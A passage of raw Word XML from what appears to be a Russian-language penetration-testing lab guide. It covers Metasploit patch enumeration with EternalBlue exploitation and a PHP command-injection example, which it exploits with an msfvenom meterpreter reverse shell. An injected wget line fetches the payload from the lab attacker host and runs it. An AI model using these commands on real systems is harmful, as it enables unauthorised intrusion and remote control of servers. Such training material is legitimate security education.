    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно настроить модуль для поиска конкретных обновлений — точнее, их отсутствия. Для этого отправим сессию в бэкграунд:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1541145"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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5411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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее выберем модуль </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/windows/gather/enum_patches </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и настроим его параметры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5475440" cy="2347510"/>
            <wp:effectExtent b="0" l="0" r="0" t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5440" cy="2347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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Осталось запустить эксплуатацию:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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838700" cy="933450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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933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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Видим, что обновление не установлено. Поэтому систему можно атаковать эксплоитом </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и получить шелл под управлением </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System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102">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="3221355"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27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2213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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3mjm6qevop7z" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 6. Веб-шелл при помощи meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Зачастую </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">веб-сервер компании доступен и из локальной, и из глобальной сети —например, если у него два сетевых интерфейса. В этом случае именно взлом веб-сервера станет первым этапом проникновения злоумышленника во внутреннюю сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Такая возможность есть по следующей причине. Иногда при проектировании серверной части веб-приложения программисты реализуют возможность выполнять команды ОС, используя веб-интерфейс. Если введенные данные при этом не фильтруются, может присутствовать уязвимость Command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Допустим, на сервере реализован такой сценарий удаления документов:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="9630.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="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630"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9630"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="efefef" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109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if( isset( $_POST[ 'Submit' ]  ) ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B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    // Get input</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C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    $target = $_REQUEST[ 'ip' ];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D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    // Determine OS and execute the ping command.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F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    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110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        // Windows</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111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        $cmd = shell_exec( 'ping  ' . $target );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112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    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113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    else {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114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        // *nix</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115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        $cmd = shell_exec( 'ping  -c 4 ' . $target );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116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    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117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    // Feedback for the end user</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119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    echo "&lt;pre&gt;{$cmd}&lt;/pre&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B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?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Если внимательно присмотреться к коду, можно заметить, что параметр </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> передается в переменную </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую из запроса. Затем переменная </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> помещается в функцию </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ограничения на передаваемые данные при этом не накладываются, поэтому можно попробовать передать еще какую-нибудь команду:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1643380"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28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643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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Видим, что помимо </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping 192.168.56.102 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">выполнилась команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Так на сервер можно передавать команды Linux, они будут выполняться и результат вернется злоумышленнику. Это уязвимость Command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Злоумышленник может загрузить на удаленный узел шелл на </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, который выполняется с правами того пользователя, который запустит скрипт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Для этого генерируется payload при помощи команды: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="b7b7b7" w:val="clear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msfvenom -p php/meterpreter/reverse_tcp -f raw lhost=192.168.56.103 lport=4444 -o /var/www/html/mtrprpt_shell.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="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-p php/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это тип шелла;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 -f raw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — формат выходных данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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lhost=192.168.56.103 lport=4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметры сервера Kali linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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-o /var/www/html/mtrprpt_shell.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выходной файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A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514932" cy="1279190"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29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4932" cy="12791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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Нужно убрать комментарий перед строкой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. У созданного файла следует установить атрибут исполняемого:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9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chmod a+x mtrprpt_shell.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь надо загрузить этот файл на уязвимый сервер, переименовать в нем расширение на </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и запустить. Сначала запустим на Kali Linux веб-сервер при помощи команды:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10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service apache2 start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ч</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">тобы отловить подключения, поднимем на Kali Linux хендлер и в качестве payload укажем у него такой же тип, как у заданного в файле:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11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set payload php/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133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В остальном настройки аналогичны хендлеру, который мы рассмотрели выше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь с этого сервера можно будет загрузить созданный ранее скрипт, переименовать в нем расширение на php и запустить его:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12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;wget http://192.168.56.103/mtrprpt_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="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;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это символ отделения команд;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.56.103/mtrprpt_shell.txt -O /tmp/shell.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — скачиваем файл командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> в каталог</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и переименовываем его в </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php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138">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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php -f /tmp/shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — запускаем шелл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="970915"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30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9709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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно проверить параметры пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B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171825" cy="933450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31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933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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
